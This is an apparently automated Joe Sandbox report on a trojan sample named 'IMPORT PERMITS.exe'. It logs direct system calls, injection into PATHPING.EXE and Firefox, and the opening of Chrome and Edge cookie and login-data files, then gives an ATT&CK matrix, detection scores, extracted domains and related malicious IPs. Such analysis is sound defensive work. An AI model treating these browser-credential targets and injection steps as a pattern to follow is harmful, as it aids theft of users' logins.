                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Memory written: C:\Users\user\Desktop\IMPORT PERMITS.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Section loaded: NULL target: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Section loaded: NULL target: C:\Windows\SysWOW64\PATHPING.EXE protection: execute and read and write
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: NULL target: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe protection: read write
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: NULL target: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\PATHPING.EXE Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\PATHPING.EXE Thread register set: target process: 2364
                Source: C:\Windows\SysWOW64\PATHPING.EXE Thread APC queued: target process: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Process created: C:\Users\user\Desktop\IMPORT PERMITS.exe "C:\Users\user\Desktop\IMPORT PERMITS.exe"
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe Process created: C:\Windows\SysWOW64\PATHPING.EXE "C:\Windows\SysWOW64\PATHPING.EXE"
                Source: C:\Windows\SysWOW64\PATHPING.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: gKZXbGXeVZyo.exe, 00000006.00000002.4121462972.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000000.1970764313.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4121607040.0000000001960000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: gKZXbGXeVZyo.exe, 00000006.00000002.4121462972.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000000.1970764313.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4121607040.0000000001960000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: gKZXbGXeVZyo.exe, 00000006.00000002.4121462972.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000000.1970764313.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4121607040.0000000001960000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: gKZXbGXeVZyo.exe, 00000006.00000002.4121462972.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000000.1970764313.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4121607040.0000000001960000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Users\user\Desktop\IMPORT PERMITS.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: 2.2.IMPORT PERMITS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.IMPORT PERMITS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.4121846462.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4121706840.00000000008C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2058360059.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.4123927554.00000000057E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4121787054.0000000004A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2058495171.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\PATHPING.EXE, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match, File source: 2.2.IMPORT PERMITS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.IMPORT PERMITS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.4121846462.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4121706840.00000000008C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2058360059.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.4123927554.00000000057E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4121787054.0000000004A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2058495171.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                Behavior Graph ID: 1547340, Sample: IMPORT PERMITS.exe, Startdate: 02/11/2024, Architecture: WINDOWS, Score: 100

                Source | Detection | Scanner | Label | Link
                IMPORT PERMITS.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun |
                IMPORT PERMITS.exe | 56% | Virustotal | | Browse
                IMPORT PERMITS.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                www.dbasky.net | 0% | Virustotal | | Browse
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/GameInfoDataSet.xsdGFinalProjectTV.Properties.ResourcesIMPORT PERMITS.exefalse
                                                                                                                      unknown
                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchPATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.galapagosdesign.com/DPleaseIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.fonts.comIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.sandoll.co.krIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.urwpp.deDPleaseIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.zhongyicts.com.cnIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.sakkal.comIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.apache.org/licenses/LICENSE-2.0IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://www.fontbureau.comIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://www.ecosia.org/newtab/PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://www.cmdh1c.xyzgKZXbGXeVZyo.exe, 00000008.00000002.4123927554.0000000005848000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://www.carterandcone.comlIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://ac.ecosia.org/autocomplete?q=PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.fontbureau.com/designers/cabarga.htmlNIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.founder.com.cn/cnIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.fontbureau.com/designers/frere-user.htmlIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.monotype.IMPORT PERMITS.exe, 00000000.00000002.1769255784.0000000005B40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://www.jiyu-kobo.co.jp/IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://www.fontbureau.com/designers8IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://www.ukraine.com.ua/wiki/hosting/errors/site-not-served/PATHPING.EXE, 00000007.00000002.4122469051.0000000004668000.00000004.10000000.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4122240673.0000000004748000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1547340
Start date and time: 2024-11-02 08:10:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: IMPORT PERMITS.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@16/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 95
• Number of non-executed functions: 280
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
Time | Type | Description
03:11:00 | API Interceptor | 1x Sleep call for process: IMPORT PERMITS.exe modified
03:12:10 | API Interceptor | 8846631x Sleep call for process: PATHPING.EXE modified
                                                                                                                              HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                              • 81.88.48.71
                                                                                                                              Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              rBALT-10212024.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              Invoice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              INTERQGMOInternetIncJPdraft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 163.44.176.12
                                                                                                                              http://3d1.gmobb.jp/dcm299ccyag4e/gov/Get hashmaliciousPhisherBrowse
                                                                                                                              • 133.130.64.224
                                                                                                                              INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 163.44.176.12
                                                                                                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 118.27.39.62
                                                                                                                              splarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 133.130.30.78
                                                                                                                              ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 150.95.219.226
                                                                                                                              nklppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 157.7.100.28
                                                                                                                              la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 160.251.222.180
